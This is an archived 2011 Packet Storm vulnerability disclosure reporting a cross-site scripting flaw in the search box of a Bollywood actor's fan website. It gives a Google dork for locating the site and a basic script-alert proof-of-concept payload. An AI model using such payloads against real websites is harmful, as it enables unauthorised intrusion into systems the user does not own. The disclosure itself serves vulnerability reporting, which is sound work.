Hrithikrules.com Cross Site Scripting

2011-12-12T00:00:00
ID PACKETSTORM:107790
Type packetstorm
Reporter Abhinav Singh
Modified 2011-12-12T00:00:00

Description

                                        
                                            `##################################################################################################################  
  
  
HackingAlert  
  
Security Lies within you   
  
##################################################################################################################  
  
# Exploit Title: www.hrithikrules.com XSS vulnerability  
# Date: 12/12/2011  
# Author: Abhinav Singh  
# Website: http://hackingalert.blogspot.com  
# Tested On: Win7  
# Platform: -  
# Email: abhinavbom@gmail.com  
# Google Dork : ©2010 HrithikRules.com  
  
#site info : Hrithikrules is the official website of popular Bollywood actor Hrithik Roshan.  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
[$] Vulnerable : http://www.hrithikrules.com  
  
[$] script : <script>alert('hackingalert');</script>  
  
[$] Vulnerable link : http://www.hrithikrules.com search box.   
  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
Greetz : everyone in SecurityXploded Community(www.securityxploded.com)  
  
LYNS  
  
`